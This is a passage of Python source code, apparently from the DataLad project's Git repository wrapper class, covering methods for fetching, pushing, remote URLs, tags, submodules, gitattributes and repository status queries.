then closing) their own.\n\n Parameters\n ----------\n remote : str\n prefer_push : bool, optional\n Use `remote.<remote>.pushurl` if there is one, falling back to\n `remote.<remote>.url`.\n \"\"\"\n if remote:\n url = None\n if prefer_push:\n url = self.get_remote_url(remote, push=True)\n url = url or self.get_remote_url(remote)\n if url and is_ssh(url):\n ssh_manager.get_connection(url).open()\n\n def update_remote(self, name: Optional[str] = None, verbose: bool = False) -> None:\n \"\"\"\n \"\"\"\n options = [\"-v\"] if verbose else []\n self._maybe_open_ssh_connection(name)\n namelst = [name] if name else []\n self.call_git(\n ['remote'] + namelst + ['update'] + options,\n expect_stderr=True\n )\n\n def fetch(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool = False, git_options: Optional[list[str]] = None,\n **kwargs: Option) -> list[FetchInfo]:\n \"\"\"Fetches changes from a remote (or all remotes).\n\n Parameters\n ----------\n remote : str, optional\n name of the remote to fetch from. If no remote is given and\n `all_` is not set, the tracking branch is fetched.\n refspec : str or list, optional\n refspec(s) to fetch.\n all_ : bool, optional\n fetch all remotes (and all of their branches).\n Fails if `remote` was given.\n git_options : list, optional\n Additional command line options for git-fetch.\n kwargs :\n Deprecated. GitPython-style keyword argument for git-fetch.\n Will be appended to any git_options.\n \"\"\"\n git_options = ensure_list(git_options)\n if kwargs:\n git_options.extend(to_options(True, **kwargs))\n return list(\n self.fetch_(\n remote=remote,\n refspec=refspec,\n all_=all_,\n git_options=git_options,\n )\n )\n\n def fetch_(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool = False, git_options: Optional[list[str]] = None) -> Iterator[FetchInfo]:\n \"\"\"Like `fetch`, but returns a generator\"\"\"\n yield from self._fetch_push_helper(\n base_cmd=self._git_cmd_prefix + ['fetch', '--verbose', '--progress'],\n action='fetch',\n urlvars=('remote.{}.url', 'remote.{}.url'),\n protocol=GitProgress,\n info_cls=FetchInfo,\n info_from='stderr',\n add_remote=False,\n remote=remote,\n refspec=refspec,\n all_=all_,\n git_options=git_options)\n\n def push(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_remotes: bool = False,\n all_: bool = False, git_options: Optional[list[str]] = None, **kwargs: Option) -> list[PushInfo]:\n \"\"\"Push changes to a remote (or all remotes).\n\n If remote and refspec are specified, and remote has\n `remote.{remote}.datalad-push-default-first` configuration variable\n set (e.g. by `create-sibling-github`), we will first push the first\n refspec separately to possibly ensure that the first refspec is chosen\n by remote as the \"default branch\".\n See https://github.com/datalad/datalad/issues/4997\n Upon successful push if this variable was set in the local git config,\n we unset it, so subsequent pushes would proceed normally.\n\n Parameters\n ----------\n remote : str, optional\n name of the remote to push to. If no remote is given and\n `all_` is not set, the tracking branch is pushed.\n refspec : str or list, optional\n refspec(s) to push.\n all_ : bool, optional\n push to all remotes. Fails if `remote` was given.\n git_options : list, optional\n Additional command line options for git-push.\n kwargs :\n Deprecated. GitPython-style keyword argument for git-push.\n Will be appended to any git_options.\n \"\"\"\n git_options = ensure_list(git_options)\n if kwargs:\n git_options.extend(to_options(True, **kwargs))\n if all_remotes:\n # be nice to the elderly\n all_ = True\n\n push_refspecs = [refspec]\n cfg = self.config # shortcut\n cfg_push_var = \"remote.{}.datalad-push-default-first\".format(remote)\n if remote and refspec and cfg.obtain(cfg_push_var, default=False, valtype=bool):\n refspec = ensure_list(refspec)\n lgr.debug(\"As indicated by %s pushing first refspec %s separately first\",\n cfg_push_var, refspec[0])\n push_refspecs = [[refspec[0]], refspec[1:]]\n\n push_res: list[PushInfo] = []\n for refspecs in push_refspecs:\n push_res.extend(\n self.push_(\n remote=remote,\n refspec=refspecs,\n all_=all_,\n git_options=git_options,\n )\n )\n # note: above push_ should raise exception if errors out\n if '--dry-run' not in git_options \\\n and cfg.get_from_source('local', cfg_push_var) is not None:\n lgr.debug(\"Removing %s variable from local git config after successful push\", cfg_push_var)\n cfg.unset(cfg_push_var, 'local')\n return push_res\n\n def push_(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool = False, git_options: Optional[list[str]] =None) -> Iterator[PushInfo]:\n \"\"\"Like `push`, but returns a generator\"\"\"\n yield from self._fetch_push_helper(\n base_cmd=self._git_cmd_prefix + ['push', '--progress', '--porcelain'],\n action='push',\n urlvars=('remote.{}.pushurl', 'remote.{}.url'),\n protocol=StdOutCaptureWithGitProgress,\n info_cls=PushInfo,\n info_from='stdout',\n add_remote=True,\n remote=remote,\n refspec=refspec,\n all_=all_,\n git_options=git_options)\n\n def _fetch_push_helper(\n self,\n base_cmd: list[str], # arg list\n action: str, # label fetch|push\n urlvars: tuple[str, ...], # variables to query for URLs\n protocol: type[WitlessProtocol], # processor for output\n info_cls: type[InfoT], # Push|FetchInfo\n info_from: str, # stdout, stderr\n add_remote: bool, # whether to add a 'remote' field to the info dict\n remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool =False, git_options: Optional[list[str]] = None) -> Iterator[InfoT]:\n\n git_options = ensure_list(git_options)\n\n cmd = base_cmd + git_options\n\n if remote is None:\n if refspec:\n # conflicts with using tracking branch or push all remotes\n # For now: Just fail.\n # TODO: May be check whether it fits to tracking branch\n raise ValueError(\n \"refspec specified without a remote. ({})\".format(refspec))\n if all_:\n remotes_to_process = self.get_remotes(with_urls_only=True)\n else:\n # No explicit remote to fetch.\n # => get tracking branch:\n tb_remote, refspec = self.get_tracking_branch()\n if tb_remote is not None:\n remotes_to_process = [tb_remote]\n else:\n # No remote, no tracking branch\n # => fail\n raise ValueError(\n \"Neither a remote is specified to {} \"\n \"from nor a tracking branch is set up.\".format(action))\n else:\n if all_:\n raise ValueError(\n \"Option 'all_' conflicts with specified remote \"\n \"'{}'.\".format(remote))\n remotes_to_process = [remote]\n\n if refspec:\n # prep for appending to cmd\n refspec = ensure_list(refspec)\n\n # no need for progress report, when there is just one remote\n log_remote_progress = len(remotes_to_process) > 1\n if log_remote_progress:\n pbar_id = '{}remotes-{}'.format(action, id(self))\n log_progress(\n lgr.info,\n pbar_id,\n 'Start %sing remotes for %s', action, self,\n total=len(remotes_to_process),\n label=action.capitalize(),\n unit=' Remotes',\n )\n try:\n for remote in remotes_to_process:\n r_cmd = cmd + [remote]\n if refspec:\n r_cmd += refspec\n\n if log_remote_progress:\n log_progress(\n lgr.info,\n pbar_id,\n '{}ing remote %s'.format(action.capitalize()),\n remote,\n update=1,\n increment=True,\n )\n # best effort to enable SSH connection caching\n url = self.config.get(\n # make two attempts to get a URL\n urlvars[0].format(remote),\n self.config.get(\n urlvars[1].format(remote),\n None)\n )\n if url and is_ssh(url):\n ssh_manager.get_connection(url).open()\n try:\n out = self._git_runner.run(\n r_cmd,\n protocol=protocol,\n )\n output = out[info_from] or ''\n except CommandError as e:\n output = None\n # intercept some errors that we express as an error report\n # in the info dicts\n if re.match(\n '.*^error: failed to (push|fetch) some refs',\n e.stderr,\n re.DOTALL | re.MULTILINE):\n output = getattr(e, info_from)\n hints = ' '.join([l[6:] for l in e.stderr.splitlines()\n if l.startswith('hint: ')])\n if output is None:\n output = ''\n if not output:\n raise\n\n assert isinstance(output, str)\n for line in output.splitlines():\n try:\n # push info doesn't identify a remote, add it here\n pi = info_cls._from_line(line)\n if add_remote:\n pi['remote'] = remote\n # There were errors, but Git provided hints\n if 'error' in pi['operations']:\n pi['hints'] = hints or None\n yield pi\n except Exception:\n # it is not progress and no push info\n # don't hide it completely\n lgr.debug('git-%s reported: %s', action, line)\n finally:\n if log_remote_progress:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished %sing remotes for %s', action, self,\n )\n\n def get_remote_url(self, name: str, push: bool = False) -> Optional[str]:\n \"\"\"Get the url of a remote.\n\n Reads the configuration of remote `name` and returns its url or None,\n if there is no url configured.\n\n Parameters\n ----------\n name: str\n name of the remote\n push: bool\n if True, get the pushurl instead of the fetch url.\n \"\"\"\n\n var = 'remote.{0}.{1}'.format(name, 'pushurl' if push else 'url')\n return self.config.get(var, None)\n\n def set_remote_url(self, name: str, url: str, push: bool = False) -> None:\n \"\"\"Set the URL a remote is pointing to\n\n Sets the URL of the remote `name`. Requires the remote to already exist.\n\n Parameters\n ----------\n name: str\n name of the remote\n url: str\n push: bool\n if True, set the push URL, otherwise the fetch URL\n \"\"\"\n\n var = 'remote.{0}.{1}'.format(name, 'pushurl' if push else 'url')\n self.config.set(var, url, scope='local', reload=True)\n\n def get_branch_commits_(self, branch: Optional[str] = None, limit: Optional[str] = None, stop: Optional[str] = None) -> Iterator[str]:\n \"\"\"Return commit hexshas for a branch\n\n Parameters\n ----------\n branch: str, optional\n If not provided, assumes current branch\n limit: None | 'left-only', optional\n Limit which commits to report. If None -- all commits (merged or not),\n if 'left-only' -- only the commits from the left side of the tree upon\n merges\n stop: str, optional\n hexsha of the commit at which stop reporting (matched one is not\n reported either)\n\n Yields\n ------\n str\n \"\"\"\n cmd = ['rev-list']\n if limit == 'left-only':\n cmd.append('--left-only')\n if not branch:\n branch = self.get_active_branch()\n if branch is None:\n raise ValueError(\"Branch not provided and no active branch\")\n cmd.append(branch)\n # and trailing -- marker to make sure that Git never confused the branch\n # with a potentially existing directory of the same name\n cmd.append('--')\n for r in self.call_git_items_(cmd):\n if stop and stop == r:\n return\n yield r\n\n def checkout(self, name: str, options: Optional[list[str]] = None) -> None:\n \"\"\"\n \"\"\"\n # TODO: May be check for the need of -b options herein?\n cmd = ['checkout']\n if options:\n cmd += options\n cmd += [str(name)]\n\n self.call_git(cmd, expect_stderr=True)\n # checkout can change committed config, or create branch config\n self.config.reload()\n\n # TODO: Before implementing annex merge, find usages and check for a needed\n # change to call super().merge\n def merge(self, name: str, options: Optional[list[str]] = None, msg: Optional[str] = None, allow_unrelated: bool = False, **kwargs: Any) -> None:\n if options is None:\n options = []\n if msg:\n options = options + [\"-m\", msg]\n if allow_unrelated:\n options += ['--allow-unrelated-histories']\n self.call_git(\n ['merge'] + options + [name],\n **kwargs\n )\n\n def remove_branch(self, branch: str) -> None:\n self.call_git(['branch', '-D', branch])\n\n def cherry_pick(self, commit: str) -> None:\n \"\"\"Cherry pick `commit` to the current branch.\n\n Parameters\n ----------\n commit : str\n A single commit.\n \"\"\"\n self.call_git([\"cherry-pick\", commit])\n\n @property\n def dirty(self) -> bool:\n \"\"\"Is the repository dirty?\n\n Note: This provides a quick answer when you simply want to know if\n there are any untracked changes or modifications in this repository or\n its submodules. For finer-grained control and more detailed reporting,\n use status() instead.\n \"\"\"\n stdout = self.call_git(\n [\"status\", \"--porcelain\",\n # Ensure the result isn't influenced by status.showUntrackedFiles.\n \"--untracked-files=normal\",\n # Ensure the result isn't influenced by diff.ignoreSubmodules.\n \"--ignore-submodules=none\"])\n if bool(stdout.strip()):\n # The quick `git status`-based check can give a different answer\n # than `datalad status` for submodules on an adjusted branch.\n st = self.diffstatus(fr=\"HEAD\" if self.get_hexsha() else None,\n to=None, untracked=\"normal\")\n return any(r.get(\"state\") != \"clean\" for r in st.values())\n return False\n\n @property\n def untracked_files(self) -> list[str]:\n \"\"\"Legacy interface, do not use! Use the status() method instead.\n\n Despite its name, it also reports on untracked datasets, and\n yields their names with trailing path separators.\n \"\"\"\n return [\n '{}{}'.format(\n str(p.relative_to(self.pathobj)),\n os.sep if props['type'] != 'file' else ''\n )\n for p, props in self.status(\n untracked='all', eval_submodule_state='no').items()\n if props.get('state', None) == 'untracked'\n ]\n\n def gc(self, allow_background: bool = False, auto: bool = False) -> None:\n \"\"\"Perform house keeping (garbage collection, repacking)\"\"\"\n cmd_options = []\n if not allow_background:\n cmd_options += ['-c', 'gc.autodetach=0']\n cmd_options += ['gc', '--aggressive']\n if auto:\n cmd_options += ['--auto']\n self.call_git(cmd_options)\n\n def _parse_gitmodules(self) -> dict[PurePosixPath, dict[str, str]]:\n # TODO read .gitconfig from Git blob?\n gitmodules = self.pathobj / '.gitmodules'\n if not gitmodules.exists():\n return {}\n # pull out file content\n out = self.call_git(\n ['config', '-z', '-l', '--file', '.gitmodules'],\n read_only=True)\n # abuse our config parser\n # disable multi-value report, because we could not deal with them\n # anyways, and they should not appear in a normal .gitmodules file\n # but could easily appear when duplicates are included. In this case,\n # we better not crash\n db, _ = parse_gitconfig_dump(out, cwd=self.path, multi_value=False)\n mods: dict[str, dict[str, str]] = {}\n for k, v in db.items():\n if not k.startswith('submodule.'):\n # we don't know what this is\n lgr.warning(\"Skip unrecognized .gitmodule specification: %s=%s\", k, v)\n continue\n k_l = k.split('.')\n # module name is everything after 'submodule.' that is not the variable\n # name\n mod_name = '.'.join(k_l[1:-1])\n # variable name is the last 'dot-free' segment in the key\n mods.setdefault(mod_name, {})[k_l[-1]] = v\n\n out = {}\n # bring into traditional shape\n for name, props in mods.items():\n if 'path' not in props:\n lgr.warning(\"Failed to get '%s.path', skipping this submodule\", name)\n continue\n modprops = {'gitmodule_{}'.format(k): v\n for k, v in props.items()\n if not k.startswith('__')}\n # Keep as PurePosixPath for possible normalization of / in the path etc\n modpath = PurePosixPath(props['path'])\n modprops['gitmodule_name'] = name\n out[modpath] = modprops\n return out\n\n def get_submodules_(self, paths: Optional[list[str | PathLike[str]]] = None) -> Iterator[dict]:\n \"\"\"Yield submodules in this repository.\n\n Parameters\n ----------\n paths : list(pathlib.PurePath), optional\n Restrict submodules to those under `paths`. Paths must be relative\n to the resolved repository root, and must be normed to match the\n reporting done by Git, i.e. no parent dir components\n (ala \"some/../this\").\n\n Returns\n -------\n A generator that yields a dictionary with information for each\n submodule.\n \"\"\"\n if not (self.pathobj / \".gitmodules\").exists():\n return\n\n modinfo = self._parse_gitmodules()\n if not modinfo:\n # we exit early, if there is nothing on record (even though\n # a .gitmodules file exists).\n # without this conditional exit, we would be able to discover\n # subprojects even when they are not recorded in .gitmodules,\n # but at the cost of running an unconstrained ls-files call\n # below\n return\n\n posix_mod_paths = [m.as_posix() for m in modinfo]\n if paths:\n # harmonize them into relative to the repository\n posix_paths = []\n for path in paths:\n path = ut.PurePath(path)\n if path.is_absolute():\n try:\n path = path.relative_to(self.pathobj)\n except ValueError as exc:\n lgr.debug(\n \"Path %s it not underneath %s, skipping since nothing should match it: %s\",\n path, self.pathobj, CapturedException(exc)\n )\n continue\n posix_paths.append(path.as_posix())\n\n # constrain the report by the given paths, make sure all paths are POSIX\n posix_mod_paths = list(get_filtered_paths_(\n posix_mod_paths,\n posix_paths,\n include_within_path=True,\n ))\n\n for r in self.call_git_items_(\n ['ls-files', '--stage', '-z'],\n sep='\\0',\n files=posix_mod_paths,\n read_only=True,\n keep_ends=True,\n ):\n if not r.startswith('160000'):\n # make sure this method never talks about non-dataset\n # content\n continue\n props, rpath = r.split('\\t')\n mode, gitsha, stage = props.split(' ')\n if stage not in ('0', '2'):\n # we either have non-merge situation, or a simple merge\n # situation (i.e. stage=0). the reported gitsha always\n # matches what we have locally.\n # or we are in a three-way merge, in which case stage=2\n # is what we want to report, because it matches the\n # current HEAD (see git-read-tree manpage).\n # there is either a stage 2 or stage 0, never both\n continue\n # remove the expected line separator from the path\n rpath = rpath[:-1]\n path = PurePosixPath(rpath)\n yield dict(\n path=self.pathobj / rpath, # full path returned here\n type='dataset',\n gitshasum=gitsha,\n **modinfo.get(path, {})\n )\n\n def get_submodules(self, sorted_: bool = True, paths: Optional[list[str | PathLike[str]]] = None) -> list[dict]:\n \"\"\"Return list of submodules.\n\n Parameters\n ----------\n sorted_ : bool, optional\n Sort submodules by path name.\n paths : list(pathlib.PurePath), optional\n Restrict submodules to those under `paths`.\n\n Returns\n -------\n List of submodule namedtuples if `compat` is true or otherwise a list\n of dictionaries as returned by `get_submodules_`.\n \"\"\"\n xs = self.get_submodules_(paths=paths)\n\n if sorted_:\n return sorted(xs, key=lambda x: x[\"path\"])\n else:\n return list(xs)\n\n def update_ref(self, ref: str, value: str, oldvalue: Optional[str] = None, symbolic: bool = False) -> None:\n \"\"\"Update the object name stored in a ref \"safely\".\n\n Just a shim for `git update-ref` call if not symbolic, and\n `git symbolic-ref` if symbolic\n\n Parameters\n ----------\n ref : str\n Reference, such as `ref/heads/BRANCHNAME` or HEAD.\n value : str\n Value to update to, e.g. hexsha of a commit when updating for a\n branch ref, or branch ref if updating HEAD\n oldvalue: str\n Value to update from. Safeguard to be verified by git. This is only\n valid if `symbolic` is not True.\n symbolic : None\n To instruct if ref is symbolic, e.g. should be used in case of\n ref=HEAD\n \"\"\"\n if symbolic:\n if oldvalue:\n raise ValueError(\"oldvalue and symbolic must not be given both\")\n cmd = ['symbolic-ref', ref, value]\n else:\n cmd = ['update-ref', ref, value] + ([oldvalue] if oldvalue else [])\n self.call_git(cmd)\n\n def tag(self, tag: str, message: Optional[str] = None, commit: Optional[str] = None, options: Optional[list[str]] = None) -> None:\n \"\"\"Tag a commit\n\n Parameters\n ----------\n tag : str\n Custom tag label. Must be a valid tag name.\n message : str, optional\n If provided, adds ['-m', <message>] to the list of `git tag`\n arguments.\n commit : str, optional\n If provided, will be appended as last argument to the `git tag` call,\n and can be used to identify the commit that shall be tagged, if\n not HEAD.\n options : list, optional\n Additional command options, inserted prior a potential `commit`\n argument.\n \"\"\"\n # TODO: call in save.py complains about extensive logging. When does it\n # happen in what way? Figure out, whether to just silence it or raise or\n # whatever else.\n args = ['tag']\n if message:\n args += ['-m', message]\n if options is not None:\n args.extend(options)\n args.append(tag)\n if commit:\n args.append(commit)\n self.call_git(args)\n\n @overload\n def get_tags(self, output: None = None) -> list[dict[str, str]]:\n ...\n\n @overload\n def get_tags(self, output: str) -> list[str]:\n ...\n\n def get_tags(self, output: Optional[str] = None) -> list[dict[str, str]] | list[str]:\n \"\"\"Get list of tags\n\n Parameters\n ----------\n output : str, optional\n If given, limit the return value to a list of values matching that\n particular key of the tag properties.\n\n Returns\n -------\n list\n Each item is a dictionary with information on a tag. At present\n this includes 'hexsha', and 'name', where the latter is the string\n label of the tag, and the former the hexsha of the object the tag\n is attached to. The list is sorted by the creator date (committer\n date for lightweight tags and tagger date for annotated tags), with\n the most recent commit being the last element.\n \"\"\"\n tags = [\n dict(\n name=t['refname:strip=2'],\n hexsha=t['object'] if t['object'] else t['objectname'],\n )\n for t in self.for_each_ref_(\n fields=['refname:strip=2', 'objectname', 'object'],\n pattern='refs/tags',\n sort='creatordate')\n ]\n if output:\n return [t[output] for t in tags]\n else:\n return tags\n\n def describe(self, commitish: Optional[str] = None, **kwargs: Option) -> Optional[str]:\n \"\"\" Quick and dirty implementation to call git-describe\n\n Parameters\n ----------\n kwargs:\n transformed to cmdline options for git-describe;\n see __init__ for description of the transformation\n \"\"\"\n # TODO: be more precise what failure to expect when and raise actual\n # errors\n cmd = ['describe'] + to_options(True, **kwargs)\n if commitish is not None:\n cmd.append(commitish)\n try:\n describe = self.call_git(cmd, expect_fail=True)\n return describe.strip()\n except Exception:\n return None\n\n def get_tracking_branch(self, branch: Optional[str] = None, remote_only: bool = False) -> tuple[Optional[str], Optional[str]]:\n \"\"\"Get the tracking branch for `branch` if there is any.\n\n Parameters\n ----------\n branch: str\n local branch to look up. If none is given, active branch is used.\n remote_only : bool\n Don't return a value if the upstream remote is set to \".\" (meaning\n this repository).\n\n Returns\n -------\n tuple\n (remote or None, refspec or None) of the tracking branch\n \"\"\"\n if branch is None:\n branch = self.get_corresponding_branch() or self.get_active_branch()\n if branch is None:\n return None, None\n\n track_remote = self.config.get('branch.{0}.remote'.format(branch), None)\n if remote_only and track_remote == \".\":\n return None, None\n track_branch = self.config.get('branch.{0}.merge'.format(branch), None)\n return track_remote, track_branch\n\n @property\n def count_objects(self) -> dict[str, int]:\n \"\"\"return dictionary with count, size(in KiB) information of git objects\n \"\"\"\n\n count_cmd = ['count-objects', '-v']\n count_str = self.call_git(count_cmd)\n count = {key: int(value)\n for key, value in [item.split(': ')\n for item in count_str.split('\\n')\n if len(item.split(': ')) == 2]}\n return count\n\n def get_git_attributes(self) -> dict[str, str | bool]:\n \"\"\"Query gitattributes which apply to top level directory\n\n It is a thin compatibility/shortcut wrapper around more versatile\n get_gitattributes which operates on a list of paths and returns\n a dictionary per each path\n\n Returns\n -------\n dict:\n a dictionary with attribute name and value items relevant for the\n top ('.') directory of the repository, and thus most likely the\n default ones (if not overwritten with more rules) for all files within\n repo.\n \"\"\"\n return self.get_gitattributes('.')['.']\n\n def get_gitattributes(self, path: str | list[str], index_only: bool = False) -> dict[str, dict[str, str | bool]]:\n \"\"\"Query gitattributes for one or more paths\n\n Parameters\n ----------\n path: path or list\n Path(s) to query. Paths may be relative or absolute.\n index_only: bool\n Flag whether to consider only gitattribute setting that are reflected\n in the repository index, not just in the work tree content.\n\n Returns\n -------\n dict:\n Each key is a queried path (always relative to the repository root),\n each value is a dictionary with attribute\n name and value items. Attribute values are either True or False,\n for set and unset attributes, or are the literal attribute value.\n \"\"\"\n path = ensure_list(path)\n cmd = [\"check-attr\", \"-z\", \"--all\"]\n if index_only:\n cmd.append('--cached')\n # make sure we have one entry for each query path to\n # simplify work with the result\n attributes: dict[str, dict[str, str | bool]] = {p: {} for p in path}\n attr = []\n for item in self.call_git_items_(cmd, files=path, sep='\\0',\n read_only=True):\n attr.append(item)\n if len(attr) < 3:\n continue\n # we have a full record\n p, name, value = attr\n attrs = attributes[p]\n attrs[name] = \\\n True if value == 'set' else False if value == 'unset' else value\n # done, reset item\n attr = []\n return {relpath(k, self.path) if isabs(k) else k: v\n for k, v in attributes.items()}\n\n def set_gitattributes(self, attrs: list[tuple[str, dict[str, str | bool]]], attrfile: str = '.gitattributes', mode: str = 'a') -> None:\n \"\"\"Set gitattributes\n\n By default appends additional lines to `attrfile`. Note, that later\n lines in `attrfile` overrule earlier ones, which may or may not be\n what you want. Set `mode` to 'w' to replace the entire file by\n what you provided in `attrs`.\n\n Parameters\n ----------\n attrs : list\n Each item is a 2-tuple, where the first element is a path pattern,\n and the second element is a dictionary with attribute key/value\n pairs. The attribute dictionary must use the same semantics as those\n returned by `get_gitattributes()`. Path patterns can use absolute paths,\n in which case they will be normalized relative to the directory\n that contains the target .gitattributes file (see `attrfile`).\n attrfile: path\n Path relative to the repository root of the .gitattributes file the\n attributes shall be set in.\n mode: str\n 'a' to append .gitattributes, 'w' to replace it\n \"\"\"\n\n git_attributes_file = op.join(self.path, attrfile)\n attrdir = op.dirname(git_attributes_file)\n if not op.exists(attrdir):\n os.makedirs(attrdir)\n\n with open(git_attributes_file, mode + '+') as f:\n # for append, fix existing files that do not end with \\n\n if mode == 'a' and f.tell():\n f.seek(max(0, f.tell() - len(os.linesep)))\n if not f.read().endswith('\\n'):\n f.write('\\n')\n\n for pattern, attr in sorted(attrs, key=lambda x: x[0]):\n # normalize the pattern relative to the target .gitattributes file\n npath = _normalize_path(\n op.join(self.path, op.dirname(attrfile)), pattern)\n # paths in gitattributes always have to be POSIX\n npath = Path(npath).as_posix()\n attrline = u''\n if npath.count(' '):\n # quote patterns with spaces\n attrline += u'\"{}\"'.format(npath.replace('\"', '\\\\\"'))\n else:\n attrline += npath\n for a in sorted(attr):\n val = attr[a]\n if val is True:\n attrline += ' {}'.format(a)\n elif val is False:\n attrline += ' -{}'.format(a)\n else:\n attrline += ' {}={}'.format(a, val)\n f.write('{}\\n'.format(attrline))\n\n def get_content_info(self, paths: Optional[Sequence[str | PathLike[str]]] = None, ref: Optional[str] = None, untracked: str = 'all') -> dict[Path, dict[str, str | int | None]]:\n \"\"\"Get identifier and type information from repository content.\n\n This is simplified front-end for `git ls-files/tree`.\n\n Both commands differ in their behavior when queried about subdataset\n paths. ls-files will not report anything, ls-tree will report on the\n subdataset record. This function uniformly follows the behavior of\n ls-tree (report on the respective subdataset mount).\n\n Parameters\n ----------\n paths : list(pathlib.PurePath) or None\n Specific paths, relative to the resolved repository root, to query\n info for. Paths must be normed to match the reporting done by Git,\n i.e. no parent dir components (ala \"some/../this\").\n If `None`, info is reported for all content.\n ref : gitref or None\n If given, content information is retrieved for this Git reference\n (via ls-tree), otherwise content information is produced for the\n present work tree (via ls-files). With a given reference, the\n reported content properties also contain a 'bytesize' record,\n stating the size of a file in bytes.\n untracked : {'no', 'normal', 'all'}\n If and how untracked content is reported when no `ref` was given:\n 'no': no untracked files are reported; 'normal': untracked files\n and entire untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\n\n Returns\n -------\n dict\n Each content item has an entry under a pathlib `Path` object instance\n pointing to its absolute path inside the repository (this path is\n guaranteed to be underneath `Repo.path`).\n Each value is a dictionary with properties:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory'\n\n `gitshasum`\n SHASUM of the item as tracked by Git, or None, if not\n tracked. This could be different from the SHASUM of the file\n in the worktree, if it was modified.\n\n Raises\n ------\n ValueError\n In case of an invalid Git reference (e.g. 'HEAD' in an empty\n repository)\n \"\"\"\n lgr.debug('%s.get_content_info(...)', self)\n # TODO limit by file type to replace code in subdatasets command\n info: dict[Path, dict[str, str | int | None]] = dict()\n\n if paths: # is not None separate after\n # path matching will happen against what Git reports\n # and Git always reports POSIX paths\n # any incoming path has to be relative already, so we can simply\n # convert unconditionally\n # note: will be list-ified below\n posix_paths = [ut.PurePath(p).as_posix() for p in paths]\n elif paths is not None:\n return info\n else:\n posix_paths = None\n\n if posix_paths and (not ref or external_versions[\"cmd:git\"] >= \"2.29.0\"):\n # If a path points within a submodule, we need to map it to the\n # containing submodule before feeding it to ls-files or ls-tree.\n #\n # Before Git 2.29.0, ls-tree and ls-files differed in how they\n # reported paths within submodules: ls-files provided no output,\n # and ls-tree listed the submodule. Now they both return no output.\n submodules = [s[\"path\"].relative_to(self.pathobj).as_posix()\n for s in self.get_submodules_()]\n # `paths` get normalized into PurePosixPath above, submodules are POSIX as well\n posix_paths = get_parent_paths(posix_paths, submodules)\n\n # this will not work in direct mode, but everything else should be\n # just fine\n if not ref:\n # make sure no operations are pending before we figure things\n # out in the worktree\n self.precommit()\n\n # --exclude-standard will make sure to honor and standard way\n # git can be instructed to ignore content, and will prevent\n # crap from contaminating untracked file reports\n cmd = ['ls-files', '--stage', '-z']\n # untracked report mode, using labels from `git diff` option style\n if untracked == 'all':\n cmd += ['--exclude-standard', '-o']\n elif untracked == 'normal':\n cmd += ['--exclude-standard', '-o', '--directory', '--no-empty-directory']\n elif untracked == 'no':\n pass\n else:\n raise ValueError(\n 'unknown value for `untracked`: {}'.format(untracked))\n props_re = re.compile(\n r'(?P<type>[0-9]+) (?P<sha>.*) (.*)\\t(?P<fname>.*)$')\n else:\n cmd = ['ls-tree', ref, '-z', '-r', '--full-tree', '-l']\n props_re = re.compile(\n r'(?P<type>[0-9]+) ([a-z]*) (?P<sha>[^ ]*) [\\s]*(?P<size>[0-9-]+)\\t(?P<fname>.*)$')\n\n lgr.debug('Query repo: %s', cmd)\n try:\n stdout = self.call_git(\n cmd,\n files=posix_paths,\n expect_fail=True,\n read_only=True)\n except CommandError as exc:\n if \"fatal: Not a valid object name\" in exc.stderr:\n raise InvalidGitReferenceError(ref)\n raise\n lgr.debug('Done query repo: %s', cmd)\n\n self._get_content_info_line_helper(\n ref,\n info,\n stdout.split('\\0'),\n props_re)\n\n lgr.debug('Done %s.get_content_info(...)', self)\n return info\n\n def _get_content_info_line_helper(self, ref: Optional[str], info: dict[Path, dict[str, str | int | None]], lines: list[str], props_re: Pattern[str]) -> None:\n \"\"\"Internal helper of get_content_info() to parse Git output\"\"\"\n mode_type_map = {\n '100644': 'file',\n '100755': 'file',\n '120000': 'symlink',\n '160000': 'dataset',\n }\n for line in lines:\n if not line:\n continue\n inf: dict[str, str | int | None] = {}\n props = props_re.match(line)\n if not props:\n # Kludge: Filter out paths starting with .git/ to work around\n # an `ls-files -o` bug that was fixed in Git 2.25.\n #\n # TODO: Drop this condition when GIT_MIN_VERSION is at least\n # 2.25.\n if line.startswith(\".git/\"):\n lgr.debug(\"Filtering out .git/ file: %s\", line)\n continue\n # not known to Git, but Git always reports POSIX\n path = ut.PurePosixPath(line)\n inf['gitshasum'] = None\n else:\n # again Git reports always in POSIX\n path = ut.PurePosixPath(props.group('fname'))\n\n # revisit the file props after this path has not been rejected\n if props:\n inf['gitshasum'] = props.group('sha')\n inf['type'] = mode_type_map.get(\n props.group('type'), props.group('type'))\n\n if ref and inf['type'] == 'file':\n inf['bytesize'] = int(props.group('size'))\n\n # join item path with repo path to get a universally useful\n # path representation with auto-conversion and tons of other\n # stuff\n joinedpath = self.pathobj.joinpath(path)\n if 'type' not in inf:\n # be nice and assign types for untracked content\n inf['type'] = 'symlink' if joinedpath.is_symlink() \\\n else 'directory' if joinedpath.is_dir() else 'file'\n info[joinedpath] = inf\n\n def status(self, paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str= 'all', eval_submodule_state: Literal[\"commit\", \"full\", \"no\"] = 'full') -> dict[Path, dict[str, str]]:\n \"\"\"Simplified `git status` equivalent.\n\n Parameters\n ----------\n paths : list or None\n If given, limits the query to the specified paths. To query all\n paths specify `None`, not an empty list. If a query path points\n into a subdataset, a report is made on the subdataset record\n within the queried dataset only (no recursion).\n untracked : {'no', 'normal', 'all'}\n If and how untracked content is reported:\n 'no': no untracked files are reported; 'normal': untracked files\n and entire untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\n eval_submodule_state : {'full', 'commit', 'no'}\n If 'full' (the default), the state of a submodule is evaluated by\n considering all modifications, with the treatment of untracked files\n determined by `untracked`. If 'commit', the modification check is\n restricted to comparing the submodule's HEAD commit to the one\n recorded in the superdataset. If 'no', the state of the subdataset is\n not evaluated.\n\n Returns\n -------\n dict\n Each content item has an entry under a pathlib `Path` object instance\n pointing to its absolute path inside the repository (this path is\n guaranteed to be underneath `Repo.path`).\n Each value is a dictionary with properties:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory'\n `state`\n Can be 'added', 'untracked', 'clean', 'deleted', 'modified'.\n \"\"\"\n 